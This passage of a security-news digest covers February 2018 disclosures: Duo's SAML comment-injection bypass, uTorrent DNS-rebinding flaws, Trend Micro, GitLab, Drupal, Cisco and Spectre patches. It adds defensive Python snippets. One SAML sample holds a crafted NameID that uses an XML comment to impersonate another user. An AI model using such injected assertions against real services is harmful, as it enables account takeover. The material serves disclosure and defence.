"One of the causes of this vulnerability is a subtle and arguably unexpected behavior of XML libraries like Python’s 'lxml' or Ruby’s 'REXML'," write the blog's authors. Comments can be inserted into the signed assertion without invalidating the signature, but the canonicalization process of the SAML libraries tends to drop all text after the first text node when isolating the NameID.

"So," explain the researchers, "as an attacker with access to the account 'user@user.com.evil.com', I can modify *my own* SAML assertions to change the NameID to 'user@user.com' when processed by the SP." The seven characters are <!----> inserted before .evil.com. This causes the canonicalization process to drop '.evil.com', leaving the authenticated account as 'user@user.com'.
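To make the library behavior concrete, here is an added illustration written for this article; it is not code from Duo Security or from any of the affected SAML libraries. It uses Python's standard-library XML parser with comment nodes preserved (a Python 3.8 or later feature) to mimic parsers such as lxml or REXML that expose the comment as its own node, and it puts the fragile "first text node" extraction next to two defensive variants: one that takes the full text content of the NameID element, and one that rejects any NameID containing child nodes. The Subject fragments are constructed samples, not real identity-provider output.

```python
import xml.etree.ElementTree as ET

# Constructed sample fragments in the shape of a SAML 2.0 Subject element.
# They are not real identity-provider output; the comment-split NameID is
# the pattern the Duo write-up describes.
SAML_NS = "{urn:oasis:names:tc:SAML:2.0:assertion}"
SUBJECT_WITH_COMMENT = (
    '<Subject xmlns="urn:oasis:names:tc:SAML:2.0:assertion">'
    "<NameID>user@user.com<!---->.evil.com</NameID>"
    "</Subject>"
)
SUBJECT_CLEAN = (
    '<Subject xmlns="urn:oasis:names:tc:SAML:2.0:assertion">'
    "<NameID>user@user.com.evil.com</NameID>"
    "</Subject>"
)


def parse_keeping_comments(xml_text):
    """Parse XML so that comments survive as nodes in the tree.

    The stdlib parser drops comments by default; insert_comments=True
    (Python 3.8+) makes it behave like parsers that expose the comment
    and therefore split the surrounding text into two separate nodes.
    """
    parser = ET.XMLParser(target=ET.TreeBuilder(insert_comments=True))
    parser.feed(xml_text)
    return parser.close()


def _all_text(elem):
    """Concatenate every text node under elem, skipping comment bodies
    but keeping the text that follows a comment (its 'tail')."""
    parts = [elem.text or ""]
    for child in elem:
        if isinstance(child.tag, str):      # a real element: recurse
            parts.append(_all_text(child))
        parts.append(child.tail or "")      # text after a comment/element
    return "".join(parts)


def nameid_first_text_node(xml_text):
    """Fragile pattern: take only the first text node of NameID.
    With the comment present this yields 'user@user.com'."""
    nameid = parse_keeping_comments(xml_text).find(SAML_NS + "NameID")
    return nameid.text or ""


def nameid_all_text(xml_text):
    """Safer pattern: use the full text content, so a comment cannot
    truncate the identifier."""
    nameid = parse_keeping_comments(xml_text).find(SAML_NS + "NameID")
    return _all_text(nameid)


def nameid_strict(xml_text):
    """Strictest pattern: refuse a NameID that has any child node at all
    (comment, processing instruction or element); a plain identifier
    should be a single text node."""
    nameid = parse_keeping_comments(xml_text).find(SAML_NS + "NameID")
    if len(nameid) != 0:
        raise ValueError("NameID is not a single text node")
    return nameid.text or ""


if __name__ == "__main__":
    print("first text node :", nameid_first_text_node(SUBJECT_WITH_COMMENT))
    print("full text       :", nameid_all_text(SUBJECT_WITH_COMMENT))
    try:
        nameid_strict(SUBJECT_WITH_COMMENT)
    except ValueError as exc:
        print("strict          : rejected,", exc)
```

The strict variant is the one a service provider would normally want: an identifier that arrives with a comment, processing instruction or nested element inside it is not something a well-behaved identity provider emits, so rejecting it outright is cheaper and less error-prone than trying to reassemble the text.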

Not all SSO implementations are vulnerable to this glitch; but Duo has demonstrated that many are. All that is required from the attacker is a genuine account that he can 'modify' to his attack target, plus the relatively minor technical savvy to intercept and edit the SAML authentication as it passes through the browser.

"Remediation of this issue," notes the report, "somewhat depends on what relationship you have with SAML." It gets a bit complicated. "Duo has released updates for the Duo Network Gateway in version 1.2.10. If you use the DNG as a SAML Service Provider and are not at version 1.2.10 or higher (at the time of writing this, 1.2.10 is the latest version), we recommend upgrading."

Different affected SSOs will have different specific recommendations, and it would be best to refer to them for guidance. Similarly, there are different recommendations for maintainers of identity or service providers, maintainers of SAML processing libraries, and maintainers of XML parsing libraries. One thing that would help, suggest the authors, is the ability to enforce multi-factor authentication, "because this vulnerability would only allow a bypass of a user’s first factor of authentication." But the authors also warn, "if your IdP is responsible for both first factor and second factor authentication, it’s likely that this vulnerability bypasses both!"

Because multiple vendors are affected by this vulnerability, Duo Security worked with CERT/CC to co-ordinate disclosure. It provided the vulnerability information to CERT/CC on 18 December 2017. By 20 February 2018, all notified affected vendors had confirmed they were ready for disclosure; and Duo Security has disclosed the vulnerability details today.

Ann Arbor, Michigan-based Duo Security, a cloud-based provider of identity and access management solutions, announced a $70 million Series D funding round led by Meritech Capital Partners and Lead Edge Capital in October 2017. This brought the total amount raised to $119 million, and valued the company at $1.17 billion.


Flaw in Popular μTorrent Software Lets Hackers Control Your PC Remotely
27.2.2018 thehackernews
Vulnerebility


If you have installed world's most popular torrent download software, μTorrent, then you should download its latest version for Windows as soon as possible.
A security researcher at Google's Project Zero discovered a serious remote code execution vulnerability in both the 'μTorrent desktop app for Windows' and the newly launched 'μTorrent Web', which allows users to download and stream torrents directly in their web browser.
μTorrent Classic and μTorrent Web apps run in the background on the Windows machine and start a locally hosted HTTP RPC server on ports 10000 and 19575, respectively, using which users can access its interfaces over any web browser.
However, Project Zero researcher Tavis Ormandy found that several issues with these RPC servers could allow remote attackers to take control of the torrent download software with little user interaction.
According to Ormandy, the uTorrent apps are vulnerable to a hacking technique called "domain name system rebinding" that could allow any malicious website a user visits to execute malicious code on the user's computer remotely.

To execute a DNS rebinding attack, one can simply create a malicious website with a DNS name that resolves to the local IP address of the computer running a vulnerable uTorrent app.
"This requires some simple DNS rebinding to attack remotely, but once you have the secret you can just change the directory torrents are saved to, and then download any file anywhere writable," Ormandy explained.
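The reason a locally bound HTTP RPC server is reachable this way is that the browser happily sends the request as long as the attacker's hostname resolves to 127.0.0.1; the server only sees a connection from the local machine. The usual defense is for the local service to check the HTTP Host header and refuse anything that is not its own loopback name and port, because a rebinding request always carries the attacker's domain in that header. The following is an added example written for this article, not uTorrent's or BitTorrent's code: a hypothetical local RPC service on 127.0.0.1:10000 (the port and the allowed-host list are assumptions for the illustration) that applies such a check.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
import json

# Hypothetical local RPC service (constructed for this example; the port and
# host list are assumptions, not uTorrent's configuration).
LISTEN_HOST = "127.0.0.1"
LISTEN_PORT = 10000

# Only these names legitimately identify this machine in a Host header.
# A DNS-rebinding request arrives with the attacker's domain instead.
ALLOWED_HOSTS = {"localhost", "127.0.0.1", "[::1]"}


def host_header_is_local(host_header, expected_port=LISTEN_PORT):
    """Return True only if the Host header names this loopback service
    on the port it actually listens on."""
    if not host_header:
        return False
    value = host_header.strip().lower()
    if value.startswith("["):                      # bracketed IPv6 literal
        end = value.find("]")
        if end == -1:
            return False
        name, port_part = value[:end + 1], value[end + 1:]
    elif ":" in value:
        name, port_part = value.split(":", 1)
        port_part = ":" + port_part
    else:
        name, port_part = value, ""
    if port_part:
        if not (port_part.startswith(":") and port_part[1:].isdigit()):
            return False
        port = int(port_part[1:])
    else:
        port = 80                                   # HTTP default when omitted
    return name in ALLOWED_HOSTS and port == expected_port


class LocalRpcHandler(BaseHTTPRequestHandler):
    """Minimal RPC endpoint that rejects requests with a foreign Host header
    before doing anything else."""

    def do_GET(self):
        if not host_header_is_local(self.headers.get("Host")):
            self.send_response(403)
            self.end_headers()
            self.wfile.write(b"forbidden: unexpected Host header\n")
            return
        body = json.dumps({"status": "ok"}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Serve only on loopback; the Host check above is what stops a browser
    # that reached us via a rebound attacker-controlled name.
    HTTPServer((LISTEN_HOST, LISTEN_PORT), LocalRpcHandler).serve_forever()
```

Binding to 127.0.0.1 alone is not enough, which is the whole point of rebinding; the Host check is the cheap, deterministic control, and a per-session secret of the kind Ormandy mentions is the second layer that should be required on every state-changing call.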
Proof-of-Concept Exploits for uTorrent Software Released Publicly

Ormandy also provided proof-of-concept exploits for μTorrent Web and μTorrent desktop (1 and 2), which are capable of passing malicious commands through the domain in order to get them to execute on the targeted computer.
Last month, Ormandy demonstrated same attack technique against the Transmission BitTorrent app.
Ormandy reported the issues in the uTorrent client to BitTorrent in November 2017 with a 90-day disclosure deadline, but a patch was only made public on Tuesday—almost 80 days after the initial disclosure.
What's more, the company re-issued new security patches the same day after Ormandy found that, with a small tweak, his exploits continued to work in the default configuration.
"This issue is still exploitable," Ormandy said. "The vulnerability is now public because a patch is available, and BitTorrent have already exhausted their 90 days anyway."
"I see no other option for affected users but to stop using uTorrent Web and contact BitTorrent and request a comprehensive patch."
Patch your uTorrent Software NOW!
The company assured its users that all vulnerabilities reported by Ormandy in two of its products had been addressed with the release of:
μTorrent Stable 3.5.3.44358
BitTorrent Stable 7.10.3.44359
μTorrent Beta 3.5.3.44352
μTorrent Web 0.12.0.502
All users are urged to update their software immediately.


Dozen vulnerabilities discovered in Trend Micro Linux-based Email Encryption Gateway
25.2.2018 securityaffairs
Vulnerebility

Security researchers at Core Security have discovered a dozen vulnerabilities in Trend Micro Linux-based Email Encryption Gateway.
Security researchers at Core Security have discovered a dozen flaws in Trend Micro Linux-based Email Encryption Gateway, some of which have been rated critical or high severity. The flaws received the CVE identifiers CVE-2018-6219 through CVE-2018-6230.

The most severe flaw could be exploited by a local or remote attacker with access to the targeted system to execute arbitrary commands with root privileges.

“Encryption for Email Gateway [1] is a Linux-based software solution providing the ability to perform the encryption and decryption of email at the corporate gateway, regardless of the email client, and the platform from which it originated. The encryption and decryption of email on the TMEEG client is controlled by a Policy Manager that enables an administrator to configure policies based on various parameters, such as sender and recipient email addresses,” states Core Security.

“Multiple vulnerabilities were found in the Trend Micro Email Encryption Gateway web console that would allow a remote unauthenticated attacker to gain command execution as root.”

Trend Micro Email Encryption Gateway

The most serious vulnerability is CVE-2018-6223, which is related to missing authentication for appliance registration. Administrators configure the virtual appliance running Email Encryption Gateway during the deployment process via a registration endpoint.

The researchers discovered that attackers can access the endpoint without authentication to set administrator credentials and make other changes to the configuration.

“The registration endpoint is provided for system administrators to configure the virtual appliance upon deployment. However, this endpoint remains accessible without authentication even after the appliance is configured, which would allow attackers to set configuration parameters such as the administrator username and password.” continues the analysis.

The experts also discovered two high severity cross-site scripting (XSS) vulnerabilities, an arbitrary file write issue that can lead to command execution, an arbitrary log file location issue leading to command execution, and unvalidated software updates.

Remaining flaws discovered by the researchers include SQL and XML external entity (XXE) injections.

Affected packages are Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) and earlier. Trend Micro addressed ten of the vulnerabilities with version 5.5 build 1129.

According to the report timeline, Trend Micro took more than six months to issue the patches.

2017-06-05: Core Security sent an initial notification to Trend Micro, including a draft advisory.
2017-11-13: Core Security asked again (4th time) for an ETA for the official fix. We stated we need a release date or a thorough explanation on why after five months there is still no date defined. If there is no such answer we will be forced to publish the advisory.
2018-02-21: Advisory CORE-2017-0006 published.
Trend Micro confirmed that a medium severity CSRF issue and a low severity SQL injection vulnerability have not been patched due to the difficulties of implementing a fix.


GitLab Patches Domain Hijacking Vulnerability
23.2.2018 securityweek
Vulnerebility

Open source Git repository management system GitLab has addressed a security hole that could have been exploited to hijack users’ custom domains and point them to malicious content.

GitLab Pages is a feature that allows users to create websites for their projects, groups or user accounts, and then connect them to custom domains and TLS certificates.

White hat hackers noticed that no validation was being performed to ensure that the custom domain added to a user’s Pages site was actually theirs.

A custom domain can be added to GitLab Pages by creating a new DNS A record with the IP address of a Pages server. Since no validation was performed when adding custom domains, an attacker could have identified domains with DNS records pointing to the GitLab Pages server and hijacked those domains. When users visited the hijacked domains, they would have been served content from the attacker’s repository.

The attack worked against custom domains that were deleted by users but still had the DNS records for the GitLab server active.

Two researchers reported variations of this issue to GitLab via the company’s bug bounty program on HackerOne. GitLab initially decided not to fix anything, but it started taking action after the second report was submitted.

“Attacker can create fake GitLab account(s) using the email(s) from temporary/anonymous email services. Configure fake email addresses with git for further code commits. Create multiple repositories and add domain name from the vulnerable list. The attacker can then: 1) use the static websites as Command and Control centers for their malware / for other malicious intents, 2) phish the customers / visitors of the legitimate domain owners,” one of the researchers explained in the report submitted via HackerOne.

Proof-of-concept (PoC) exploits created by the researchers revealed that there had been hundreds of vulnerable domains.

GitLab initially disabled the functionality for adding custom domains to GitLab Pages, and this week it rolled out a permanent fix by requiring users to verify ownership when adding a custom domain. Verification is done by adding a DNS TXT record containing a token provided by GitLab to the user’s domain.
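The verification step described above, as an added example (not GitLab's code): the site issues a random token per domain, and the domain is attached only if a TXT record under that domain carries the token. The record label, the value format and the `resolve_txt` resolver callback are assumptions; the zone data is constructed so the example runs offline.

```python
"""Domain-ownership verification with a DNS TXT token (added example)."""
import hmac
import secrets
from typing import Callable, Iterable

# Hypothetical record label and value format, not GitLab's exact layout.
VERIFY_LABEL = "_pages-verify"
TOKEN_PREFIX = "pages-verify="


def issue_token() -> str:
    """Unguessable per-domain token from the OS CSPRNG."""
    return secrets.token_hex(16)


def txt_record_name(domain: str) -> str:
    """Name of the TXT record the domain owner must publish."""
    return f"{VERIFY_LABEL}.{domain.rstrip('.').lower()}"


def verify_domain(domain: str, expected_token: str,
                  resolve_txt: Callable[[str], Iterable[str]]) -> bool:
    """Return True only if a TXT record under `domain` carries the token.

    `resolve_txt(name)` yields the TXT strings for `name`; it is injected so a
    real resolver (e.g. dnspython) or a constructed one can be used. A missing
    record, a foreign value or a lookup failure all verify as False: the safe
    default is to refuse to attach the domain.
    """
    try:
        records = list(resolve_txt(txt_record_name(domain)))
    except Exception:
        return False
    for rec in records:
        value = rec.strip().strip('"')
        if not value.startswith(TOKEN_PREFIX):
            continue
        # Constant-time compare: timing must not leak how much of the token
        # matched. A wrong-length value simply fails.
        if hmac.compare_digest(value[len(TOKEN_PREFIX):].encode(),
                               expected_token.encode()):
            return True
    return False


# Constructed zone data standing in for real DNS answers.
LEGIT_TOKEN = "0123456789abcdef0123456789abcdef"
FAKE_ZONE = {
    # the real owner published the token they were given
    "_pages-verify.owner.example": ['"pages-verify=' + LEGIT_TOKEN + '"'],
    # a deleted site: the A record still points at Pages, but no TXT record
    "_pages-verify.stale.example": [],
    # someone else registered the domain in their own account and received a
    # token, but cannot publish it in DNS they do not control
    "_pages-verify.victim.example": ['"v=spf1 -all"'],
}


def fake_resolver(name: str):
    """Stand-in resolver: raises like NXDOMAIN for unknown names."""
    if name not in FAKE_ZONE:
        raise LookupError("NXDOMAIN")
    return FAKE_ZONE[name]


if __name__ == "__main__":
    print(verify_domain("owner.example", LEGIT_TOKEN, fake_resolver))     # True
    print(verify_domain("stale.example", LEGIT_TOKEN, fake_resolver))     # False
    print(verify_domain("victim.example", issue_token(), fake_resolver))  # False
```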

Some users pointed out on Hacker News that the problem is similar to the issue that caused Let’s Encrypt last month to disable TLS-SNI-01 validation.


Tech Giants Hit by Meltdown, Spectre Respond to Lawmakers
23.2.2018 securityweek
Vulnerebility

Intel, AMD, ARM, Apple, Amazon, Google and Microsoft have responded to lawmakers who raised questions last month about the disclosure of the CPU vulnerabilities known as Meltdown and Spectre.

The U.S. House Energy and Commerce Committee announced on January 24 that it had sent letters to the companies hit by the Meltdown/Spectre incident, inquiring about their disclosure process. The tech giants were instructed to respond by February 7 and their responses have now been made public.

The Meltdown and Spectre vulnerabilities, which allow malicious applications to access potentially sensitive data from memory, were discovered independently by researchers at Google and various universities and private companies. Affected vendors were first notified in June 2017 and the disclosure of the flaws was initially planned for January 9, but it was moved to January 3 after some experts figured out that operating system developers had been preparing patches for what appeared to be critical processor flaws.

The U.S. House Energy and Commerce Committee asked impacted vendors who proposed an embargo and why, when US-CERT and CERT/CC were notified, what impact the embargo had on critical infrastructure and other technology firms, which resources and best practices were used in implementing the embargo, and what lessons were learned regarding multi-party coordinated disclosure.

Overall, the companies said Google Project Zero, whose researchers discovered the vulnerabilities, set the embargo after consultations with affected firms. Project Zero typically gives vendors 90 days to release patches, but the deadline was significantly extended due to the “complex nature of the vulnerability and mitigations.”

None of the companies notified US-CERT and CERT/CC of Meltdown and Spectre prior to their public disclosure. The agencies learned about the flaws through the public disclosure on January 3, and US-CERT was contacted by Intel on that day and again two days later.

The companies told lawmakers that the embargo and the disclosure process were consistent with industry standard practices designed to protect the public against attacks exploiting unpatched vulnerabilities.

In response to questions regarding impact on critical infrastructure, Intel noted that “the generally understood characteristics of most [industrial control systems] suggest that risk to these systems is likely low.” Many of the major ICS vendors have published advisories to warn users of the risks associated with these attack methods.

As for lessons learned, the tech giants claim they are evaluating the situation in an effort to improve their process in the future, and many say they are open to discussions on this topic.


Dozen Flaws Found in Trend Micro Email Encryption Gateway
23.2.2018 securityweek
Vulnerebility

Researchers have discovered a dozen vulnerabilities in Trend Micro’s Email Encryption Gateway, including several issues rated critical and high severity. A majority of the flaws have been patched by the vendor.

Core Security revealed this week that its employees found several types of vulnerabilities in the Linux-based email encryption product. The most serious of the security holes can allow a local or remote attacker with access to the targeted system to execute arbitrary commands with root privileges.

Core Security has published an advisory detailing each of the vulnerabilities it has found. The flaws have been assigned the CVE identifiers CVE-2018-6219 through CVE-2018-6230.

The most serious of the flaws, rated critical based on its CVSS score, is CVE-2018-6223, an issue related to missing authentication. System admins can configure the virtual appliance running Email Encryption Gateway during the deployment process through a registration endpoint. The problem is that this endpoint can be accessed without authentication, allowing attackers to set administrator usernames and passwords and make other configuration changes.

Six of the flaws found in Email Encryption Gateway have been rated “high severity,” including an arbitrary file write issue that can lead to command execution, a couple of cross-site scripting (XSS) vulnerabilities, a command execution flaw related to arbitrary log file locations, and the lack of a validation mechanism for software updates.

Other flaws identified by Core Security researchers include SQL and XML external entity (XXE) injections.

Trend Micro informed customers that the vulnerabilities impact Email Encryption Gateway 5.5 build 1111 and earlier running on a virtual appliance. Patches for ten of the flaws are included in version 5.5 build 1129. It’s worth pointing out that it took the vendor more than half a year to release fixes.

A medium severity CSRF issue and a low severity SQL injection vulnerability have not been patched “due to the difficulties of implementing and the negative impact on critical normal product function of the proposed resolutions.” However, Trend Micro did provide some mitigations.

The company also pointed out that the Email Encryption Gateway will reach end of life (EOL) soon and advised customers to migrate to the InterScan Messaging Security product, which provides similar features and functionality.

This was not the first time Core Security researchers discovered vulnerabilities in a Trend Micro product. Back in December, the company disclosed the details of five security holes found in Trend Micro’s Smart Protection Server product.


Meltdown patch for OpenBSD is available … let’s wait for feedback
23.2.2018 securityaffairs
Vulnerebility

OpenBSD releases Version 11 code update that addresses the Meltdown vulnerability by implementing the separation between the kernel and the user memory pages.
OpenBSD addresses the Meltdown vulnerability with the release of its Version 11 code. The update implements the separation between the kernel and the user memory pages.

OpenBSD’s Phillip Guenther provided further details on the implementation.

“When a syscall, trap, or interrupt takes a CPU from userspace to kernel the trampoline code switches page tables, switches stacks to the thread’s real kernel stack, then copies over the necessary bits from the trampoline stack. On return to userspace the opposite occurs: recreate the iretq frame on the trampoline stack, switch stack, switch page tables, and return to userspace.” wrote Guenther.

“Per-CPU page layout mostly inspired by DragonFlyBSD.”

Guenther explained that the per-CPU page layout mostly follows the approach used in DragonFly BSD.

According to Guenther, the impact on performance should be limited because the approach minimizes the amount of kernel code and data mapped for the transitions to and from the kernel.

“On Intel CPUs which speculate past user/supervisor page permission checks, use a separate page table for userspace with only the minimum of kernel code and data required for the transitions to/from the kernel.” he added.

A couple of weeks ago, DTrace expert Brendan Gregg developed a “microbenchmark” to measure the performance degradation introduced by the Linux kernel page table isolation (KPTI) patch for the Meltdown CPU vulnerability. The tests demonstrated a degradation between 0.1 per cent and 6 per cent.

Let’s wait for the tests on OpenBSD.

Further technical details on the approach implemented for OpenBSD are available here.


Drupal addressed several vulnerabilities in Drupal 8 and 7
23.2.2018 securityaffairs
Vulnerebility

The Drupal development team addressed many vulnerabilities in both Drupal 8 and 7, including some flaws rated as “critical”.
Drupal maintainers have fixed many vulnerabilities in Drupal 7 and 8, including some flaws rated as “critical.”

One of the critical security vulnerabilities is related to incomplete cross-site scripting (XSS) prevention mechanisms and was addressed in Drupal 8.4.5 and 7.57. The popular CMS uses a JavaScript function that doesn’t completely sanitize its input.

“Drupal has a Drupal.checkPlain() JavaScript function which is used to escape potentially dangerous text before outputting it to HTML.” reads the advisory. “This function does not correctly handle all methods of injecting malicious HTML, leading to a cross-site scripting vulnerability under certain circumstances.”

The second vulnerability rated as critical affects Drupal 8; it could be exploited by users who have permission to post comments to view content and comments they should not be able to access. The flaw could also allow such users to add comments to content they should not be able to access.

The Drupal team also fixed two moderately critical vulnerabilities in Drupal 7 and another two in Drupal 8. The flaws in Drupal 7 are:

A private file access bypass – Drupal fails to check whether a user has access to a file before allowing the user to view or download it when the CMS is using a private file system.
A jQuery cross-site scripting vulnerability that is present when making Ajax requests to untrusted domains.
while the vulnerabilities in Drupal 8 are:

Language fallback can be incorrect on multilingual sites with node access controls. Drupal marks the untranslated version of a node as the default fallback for access queries. This fallback is used for languages that do not yet have a translated version of the created node. This can result in an access bypass vulnerability.
A Settings Tray access bypass that could be exploited by users to update certain data they do not have the permissions for.


Several Vulnerabilities Patched in Drupal
22.2.2018 securityweek
Vulnerebility

Updates released on Wednesday for Drupal 7 and 8 patch several vulnerabilities, including issues rated “critical.” No bug fixes are included in the latest releases.

One of the critical security holes patched by Drupal 8.4.5 and 7.57 is related to incomplete cross-site scripting (XSS) prevention mechanisms.

“Drupal has a Drupal.checkPlain() JavaScript function which is used to escape potentially dangerous text before outputting it to HTML. This function does not correctly handle all methods of injecting malicious HTML, leading to a cross-site scripting vulnerability under certain circumstances,” Drupal said in its advisory.

Another critical flaw, which only affects Drupal 8, allows users who have permission to post comments to view content and comments they should not be able to access. The weakness can also be exploited to add comments to the supposedly restricted content.

While these issues are rated “critical,” it’s worth pointing out that Drupal developers use NIST’s Common Misuse Scoring System to determine the risk level, which means that “critical” is second on the severity scale, after “highly critical.”

The latest Drupal 7 update also patches two moderately critical vulnerabilities. One of them, which developers claim only occurs if a site’s configuration is unusual, is an access bypass issue that can allow users to view or download files on the private file system without Drupal checking if they have access to it.

The second moderately critical flaw in Drupal 7 is a jQuery XSS issue when making Ajax requests to untrusted domains. Drupal 8 is not affected as jQuery was updated to a newer version with the release of Drupal 8.4.0.

Two moderately critical security bugs have also been fixed in Drupal 8, including an access bypass vulnerability related to language fallback on multilingual sites, and an access bypass flaw in the Settings Tray module that could allow users to update certain data without having the necessary permissions.

Finally, Drupal 7 patches a “less critical” external link injection vulnerability that can allow an attacker to trick users into navigating to a malicious site.

Drupal developers informed users that version 8.4.5 is the last release of the 8.4.x series. Users will have to update to Drupal 8.5.0, expected to become available on March 7, to receive bug and security fixes.


Cisco Patches Critical Flaws in UCDM, ESC Products
22.2.2018 securityweek
Vulnerebility

Updates released by Cisco for its Unified Communications Domain Manager (UCDM) and Elastic Services Controller (ESC) products patch critical vulnerabilities that can be exploited by remote attackers.

According to Cisco, UCDM releases prior to 11.5(2) are affected by a flaw that allows a remote, unauthenticated attacker to bypass security protections, obtain elevated privileges, and execute arbitrary code.

“The vulnerability is due to insecure key generation during application configuration. An attacker could exploit this vulnerability by using a known insecure key value to bypass security protections by sending arbitrary requests using the insecure key to a targeted application,” Cisco said in its advisory.

The security hole is tracked as CVE-2018-0124 and it was discovered by Cisco itself during internal security testing.

A critical vulnerability was also discovered by Cisco during internal security testing in the company’s ESC product, specifically the authentication functionality of the web-based service portal.

The flaw, tracked as CVE-2018-0121, allows a remote attacker to bypass authentication and gain administrator privileges on the service portal. The authentication mechanism can be bypassed by submitting an empty value when prompted to enter an admin password.

The vulnerability affects ESC 3.0.0 and it has been addressed with the release of version 3.1.0. This version also patches a high severity unauthorized access vulnerability caused by the presence of default credentials for the service portal.

Cisco also informed customers on Wednesday of a high severity denial-of-service (DoS) vulnerability in the Interactive Voice Response (IVR) management connection interface of the company’s Unified Customer Voice Portal (CVP) product. A remote attacker can exploit this flaw to cause a DoS condition by initiating a specially crafted connection to the IP address of the targeted device.

Cisco says there is no evidence that any of these vulnerabilities have been exploited in malicious attacks.

Cisco on Wednesday also released advisories for cross-site scripting (XSS), cross-site request forgery (CSRF) and DoS flaws affecting its UCS Director and Integrated Management Controller Supervisor, Unified Communications Manager, Prime Service, Prime Collaboration, Jabber Client Framework, Data Center Analytics Framework, and Unity Connection products, but they have all been assigned a “medium” severity rating.


Google white hackers disclosed critical vulnerabilities in uTorrent clients
22.2.2018 securityaffairs
Vulnerebility

White hat hackers at Google Project Zero have discovered two critical remote code execution vulnerabilities in versions of BitTorrent’s web-based uTorrent Web client and uTorrent Classic desktop client.
With tens of millions of active users a day, uTorrent is one of the most popular torrent clients; the researchers showed that the vulnerabilities could easily be exploited to deliver malware to the target computer or view past downloads.

Project Zero hacker Tavis Ormandy published a detailed analysis of the issues because the vulnerabilities were not fixed in a 90-day period according to the disclosure policy.

The flaws are tied to various JSON-RPC issues, or issues related to the way the web-based apps handle JavaScript Object Notations (JSON) as they relate to the company’s remote procedure call (RPC) servers.

“By default, utorrent creates an HTTP RPC server on port 10000 (uTorrent classic) or 19575 (uTorrent web). There are numerous problems with these RPC servers that can be exploited by any website using XMLHTTPRequest(). To be clear, visiting *any* website is enough to compromise these applications.” reads the technical analysis.

Both the desktop and the web-based uTorrent clients use a web interface, and the presence of the JSON-RPC issues makes the attack described by Ormandy possible.

The expert discovered that the issue can allow an attacker to trigger a flaw in the clients by hiding commands inside web pages that interact with uTorrent’s RPC servers.

An attacker can exploit the vulnerability to change the torrent download folder and download a file to any writable location. For example, the download directory could be changed to the Windows Startup folder and an executable file downloaded there, which would then be executed on every startup. The attacker could exploit the same flaw to gain access to the user’s download activity information.

The researchers explained that remote exploitation of the flaw requires a DNS rebinding attack, which allows JavaScript code hosted on a website to create a bridge to the local network, bypassing the same-origin policy (SOP).

“This requires some simple DNS rebinding to attack remotely, but once you have the (authentication) secret you can just change the directory torrents are saved to, and then download any file anywhere writable,” Ormandy wrote.

“The authentication secret is not the only data accessible within the webroot – settings, crashdumps, logs and other data is also accessible. As this is a complete remote compromise of the default uTorrent web configuration, I didn’t bother looking any further after finding this,” the researcher added.


Tavis Ormandy (@taviso), 10:08 PM - Feb 20, 2018:
“Hmm, it looks like BitTorrent just added a second token to uTorrent Web. That does not solve the DNS rebinding issue, it just broke my exploit. 😩”

Tavis Ormandy (@taviso), 10:20 PM - Feb 20, 2018:
“I just fixed the exploit and verified it still works. I would recommend asking BitTorrent to resolve this issue if you're affected, and it works in the default configuration so you probably are. Sigh.”

Ormandy released proof-of-concept (PoC) code for the flaws he discovered.

This week, BitTorrent released an official statement on the matter:

“On December 4, 2017, we were made aware of several vulnerabilities in the uTorrent and BitTorrent Windows desktop clients. We began work immediately to address the issue. Our fix is complete and is available in the most recent beta release (build 3.5.3.44352 released on 16 Feb 2018). This week, we will begin to deliver it to our installed base of users. All users will be updated with the fix automatically over the following days. The nature of the exploit is such that an attacker could craft a URL that would cause actions to trigger in the client without the user’s consent (e.g. adding a torrent).”


Intel releases Spectre patches for Skylake, Kaby Lake, Coffee Lake
22.2.2018 securityaffairs
Vulnerebility

Intel released a stable microcode update to address the Spectre vulnerability for its Skylake, Kaby Lake, and Coffee Lake processors in all their various variants.
Intel has released microcode to address the CVE-2017-5715 Spectre vulnerability for many of its chips; let’s hope that this time the security updates will not cause further problems.

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing information to leak from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

Problems such as frequent reboots were related to the fix for the CVE-2017-5715 Spectre flaw (Spectre Variant 2) and affected almost every platform, including systems running on Broadwell and Haswell CPUs, as well as Ivy Bridge-, Sandy Bridge-, Skylake-, and Kaby Lake-based platforms.

A couple of weeks ago Intel released new microcode for its Skylake processors, now it has announced security updates for Kaby Lake, Coffee Lake and other CPUs.

The microcode is now available for all 6th, 7th, and 8th generation Core processors and also X-series Intel Core products, as well as Xeon Scalable and Xeon D chips.

Intel released the Spectre firmware security updates for the following products:

Anniedale/Moorefield, Apollo Lake, Avoton/Rangeley, Broxton, Cherry View, Coffee Lake, Cougar Mountain, Denverton, Gemini Lake, Kaby Lake, Knights Landing, Knights Mill, Skylake, SoFIA, Tangier, Valleyview/Bay Trail, and XGold.

Intel released beta patches for Broadwell, Gladden, Haswell, some Ivy Bridge, Sandy Bridge, and Skylake Xeon E3 processors. The beta patches have been provided to OEMs for their final validation.

The patches for the remaining chips are either in pre-beta or planning phase.

Both Intel and AMD confirmed they are working on processors that will include protections against attacks such as Spectre and Meltdown.


Google Researcher Finds Critical Flaws in uTorrent Apps
21.2.2018 securityweek
Vulnerebility

Google researcher Tavis Ormandy discovered several critical vulnerabilities in the classic and web-based versions of BitTorrent’s uTorrent application. Patches have been released, but the expert says not all flaws have been fixed properly.

Ormandy found that the uTorrent Classic and the uTorrent Web apps create an HTTP RPC server on ports 10000 and 19575, respectively. Several vulnerabilities in these RPC servers allow remote attackers to take control of the apps with little user interaction.

In the case of uTorrent Web, which is accessed by users via their web browser, the application relies on a random token that is included in every request for authentication. The problem, according to Ormandy, is that the token can be easily obtained by an attacker from the web root folder and abused to take control of the service.

A malicious actor can exploit the flaw to change the torrent download folder and download a file to any writable location. For example, a hacker could change the download directory to the Startup folder in Windows and download an executable file, which would run on every startup.

An exploit can be executed remotely using a DNS rebinding attack, which allows JavaScript code hosted on a website to create a bridge to the local network, effectively bypassing the same-origin policy (SOP).

Ormandy noted that the web root folder also contains other data – not just the authentication token – including settings, logs and crash dump files.

In the case of uTorrent Classic, the Google researcher discovered a vulnerability that allows a malicious website to obtain the targeted user’s download history.

